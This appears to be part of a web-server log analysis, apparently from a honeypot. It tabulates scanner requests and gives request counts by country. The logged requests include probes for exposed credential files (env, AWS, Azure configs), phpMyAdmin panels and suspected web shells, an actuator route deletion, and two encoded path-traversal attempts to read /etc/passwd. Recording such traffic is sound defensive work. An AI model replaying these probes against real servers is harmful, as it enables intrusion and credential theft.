1727 | 1 | GET /css/sgd.php HTTP/1.1 |
1733 | 1 | GET /env.yml HTTP/1.1 |
1735 | 1 | GET /env/aws_config.js HTTP/1.1 |
1736 | 1 | DELETE /actuator/gateway/routes/2xXafNucfd13haaplSKKoL5PQgV HTTP/1.1 |
1751 | 1 | GET /data/env.bak HTTP/1.1 |
1752 | 1 | GET /data/env.json HTTP/1.1 |
1753 | 1 | GET /data/env.txt HTTP/1.1 |
1765 | 1 | GET /phpmyadmin2018/index.php HTTP/1.1 |
1766 | 1 | GET /phpMyAdmin5.2/index.php HTTP/1.1 |
1768 | 1 | GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 |
1769 | 1 | GET /google-services.json HTTP/1.1 |
1771 | 1 | GET /amplify-config.js HTTP/1.1 |
1772 | 1 | GET /.azure/azureProfile.json HTTP/1.1 |
1773 | 1 | GET /settings.py.bak HTTP/1.1 |
1774 | 1 | GET /phpmyadmin5/index.php HTTP/1.1 |
1776 | 1 | GET /php_status.php HTTP/1.1 |
1777 | 1 | GET /pip.php HTTP/1.1 |
1782 | 1 | GET /resources/env.testing HTTP/1.1 |
1785 | 1 | GET /private/aws-config.json HTTP/1.1 |
1786 | 1 | GET /private/aws_secrets.json HTTP/1.1 |
1793 | 1 | GET /protected/aws_credentials.php HTTP/1.1 |
1797 | 1 | GET /public/css/main.css HTTP/1.1 |
1798 | 1 | GET /public/js/aws-exports.js HTTP/1.1 |
1799 | 1 | GET /public/js/bundle.js HTTP/1.1 |
1801 | 1 | POST /login/ HTTP/1.1 |
1814 | 1 | GET /manual/en/book.opcache.php HTTP/1.1 |
1817 | 1 | GET /js/secrets/aws-exports.js HTTP/1.1 |
1819 | 1 | GET /lamp/test.php HTTP/1.1 |
1822 | 1 | GET /lib/aws/aws_config.py HTTP/1.1 |
1823 | 1 | GET /lib/cloud/aws_keys.php HTTP/1.1 |
1834 | 1 | GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 |
1838 | 1 | GET /modules/aws/aws_config.php HTTP/1.1 |
1839 | 1 | GET /naik_dong.php HTTP/1.1 |
1849 | 1 | GET /past.php HTTP/1.1 |
1856 | 1 | GET /logout HTTP/1.1 |
1859 | 1 | GET /logs/stacktrace.log HTTP/1.1 |
1862 | 1 | GET /password HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 5234 | AE |
1 | 678 | FR |
2 | 270 | BG |
3 | 193 | US |
4 | 86 | NL |
5 | 80 | DE |
6 | 76 | CN |
7 | 65 | PL |
8 | 51 | VN |
9 | 39 | RU |
10 | 16 | LT |
11 | 13 | AZ |
12 | 13 | AU |
13 | 12 | CA |
14 | 7 | GB |
15 | 7 | RO |
16 | 6 | BR |
17 | 5 | JP |
18 | 5 | SC |
19 | 5 | GH |
20 | 4 | UA |
21 | 4 | IN |
22 | 4 | MD |
23 | 4 | PT |
24 | 4 | SG |
25 | 2 | BE |
26 | 2 | KR |
27 | 2 | IR |
28 | 2 | KZ |
29 | 2 | TH |
30 | 2 | IE |
31 | 2 | CO |
32 | 2 | IT |
33 | 1 | AR |
34 | 1 | XK |
35 | 1 | AT |
36 | 1 | MC |
37 | 1 | NG |
38 | 1 | HK |
39 | 1 | SE |
40 | 1 | ES |
41 | 1 | AL |